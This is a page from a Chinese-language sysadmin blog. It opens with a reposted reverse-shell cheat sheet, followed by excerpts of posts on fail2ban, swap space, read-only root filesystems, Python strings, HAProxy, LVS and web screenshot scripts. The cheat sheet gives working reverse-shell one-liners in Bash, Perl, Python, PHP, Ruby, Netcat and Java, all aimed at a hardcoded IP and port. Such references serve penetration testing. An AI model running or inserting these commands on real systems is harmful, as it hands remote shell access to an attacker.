cszer

反弹shell的方法汇总(转)

分类: 技术, 安全   标签:    评论: 6   阅读:1,802 views

Bash(在ubuntu12.10下测试通过)

1
bash -i >& /dev/tcp/211.152.83.2/1234 0>&1

PERL

1
perl -e 'use Socket;$i="211.152.83.2";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("211.152.83.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP(需要启用php的fsockopen函数)

1
php -r '$sock=fsockopen("211.152.83.2",1234);exec("/bin/sh -i < &3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("211.152.83.2",1234).to_i;exec sprintf("/bin/sh -i < &%d >&%d 2>&%d",f,f,f)'

Netcat

1
2
3
nc -e /bin/sh 211.152.83.2 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 211.152.83.2 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

Java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/211.152.83.2/1234;cat < &5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

来自:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

12-16
2013

使用fail2ban防止暴力破解

分类: 技术, 安全   标签: , ,    评论: 1   阅读:4,510 views

简介:

fail2ban是linux下一款安全工具。通过监视系统日志,匹配日志的错误信息(正则式匹配),然后执行相应的屏蔽动作(一般情况下是调用防火墙屏蔽)。如:当有人在试探你的SSH、SMTP、FTP密码,只要达到你预设的次数,fail2ban就会调用防火墙屏蔽这个IP,而且可以发送e-mail通知系统管理员,是一款很实用、很强大的软件! 继续阅读 »

11-01
2013

Linux增加swap空间

分类: 技术, Linux 基础   标签:    评论: 3   阅读:1,941 views

[root@localhost ~]# free -m
             total       used       free     shared    buffers     cached
Mem:         32160      14212      17947          0        216      12096
-/+ buffers/cache:       1899      30260
Swap:         8189          0       8189

32G的内存,却只分配了8G的swap,在实际生产环境下经常出现swap空间不足的情况,需要手动增加swap空间,步骤如下: 继续阅读 »

10-22
2013

linux服务器根分区只读的处理流程

分类: 技术, Linux 运维       评论: 1   阅读:3,742 views

上周六21点左右接到值班电话,一台服务器服务器异常。连到服务器上看,根分区只读了。

之前有碰到过两三起邮件系统客户的服务器根分区只读的情况,但自己维护的服务器还是第一次碰到。不敢贸然处理,为了安全起见,打电话跟其他同事确认了下。在22:30分左右修复好文件系统,服务器恢复正常。整个处理过程花了大概1个半小时的时间,时间都耗在机房沟通和等待修复文件系统,另外自己对整个处理流程不够熟练也耽误了不少时间,否则,半个小时就可以搞定。

现将根分区只读的处理流程梳理下: 继续阅读 »

09-21
2013

写python脚本常用语法

分类: 技术, python   标签:    评论: 2   阅读:3,300 views

字符串处理:

生成字符串变量

1
str='python String function'

字符串长度获取:len(str)

1
print '%s length=%d' % (str,len(str))

字母处理
全部大写:str.upper()

1
print '%s upper=%s' % (str,str.upper())

全部小写:str.lower()

1
print '%s lower=%s' % (str,str.lower())

大小写互换:str.swapcase()

1
print '%s swapcase=%s' % (str,str.swapcase())

首字母大写,其余小写:str.capitalize()

1
print '%s capitalize=%s' % (str,str.capitalize())

首字母大写:str.title()

1
print '%s title=%s' % (str,str.title())

继续阅读 »

08-08
2013

HAProxy简介及实例

分类: 技术, Linux 运维   标签:    评论: 0   阅读:3,866 views

HAProxy提供高可用性、负载均衡以及基于TCP和HTTP应用的代 理,支持虚拟主机,它是免费、快速并且可靠的一种解决方案。HAProxy特别适用于那些负载特大的web站点,这些站点通常又需要会话保持或七层处理。HAProxy运行在当前的硬件上,完全可以支持数以万计的并发连接。并且它的运行模式使得它可以很简单安全的整合进您当前的架构中, 同时可以保护你的web服务器不被暴露到网络上。
继续阅读 »

07-16
2013

LVS简介及实战

分类: 技术, Linux 运维   标签:    评论: 4   阅读:6,071 views

以前做过一些负载均衡高可用的实验,由于在工作环境一直都没有用到这些技术,现在几乎都忘光了,记录在evernote里的实验笔记也不完整。趁着最近事情较少,重新找了些资料,把一些相关的实验再做一遍,并记录完整,以备不时之需。
继续阅读 »

07-16
2013

linux多线程网页截图-python

分类: 工作相关, python   标签: , ,    评论: 0   阅读:2,430 views

上一篇中(linux多线程网页截图-shell),使用shell多进程对大量的网站截图,大大减少了截图的时间。但慢慢的也发现了这种方式的弊端:每个进程分配的网站数量是相等的,有些进程截图较快,有些较慢,个别进程在其它进程已经截图完成后,还要运行10多个小时才能把分配的网站截图完。
如何把现有的“平均分配”截图方式改成“能者多劳”呢?
刚好最近在学习python,而python可以很方便的支持多线程。找了些资料,使用threading+queue的方式实现了“能者多劳”的多线程截图方式:
继续阅读 »

06-13
2013

linux多线程网页截图-shell

分类: 工作相关, shell   标签: ,    评论: 1   阅读:5,168 views

老大临时安排任务,要定期对大量(万为单位)的网站截图并归档保存。最早使用的是window下的一个解决方案:webshotcmd.exe+批处理。运行了一段时间,发现经常弹出webshotcmd.exe程序未响应的窗口,需要人工点击确定后才能继续截图,而且webshocmd未注册版本截出的图是灰色的,不方便查看。
google了下,发现了linux的两个截图工具cutycapt和phantomjs,经过测试,cutycapt截图较慢,但比较稳定,phantomjs截图速度较快,但时有出现进程假死的状态。权衡利弊,决定使用cutycapt+shell脚本的方式截图:
继续阅读 »

06-08
2013
第 2 页,共 15 页12345...10...最旧 »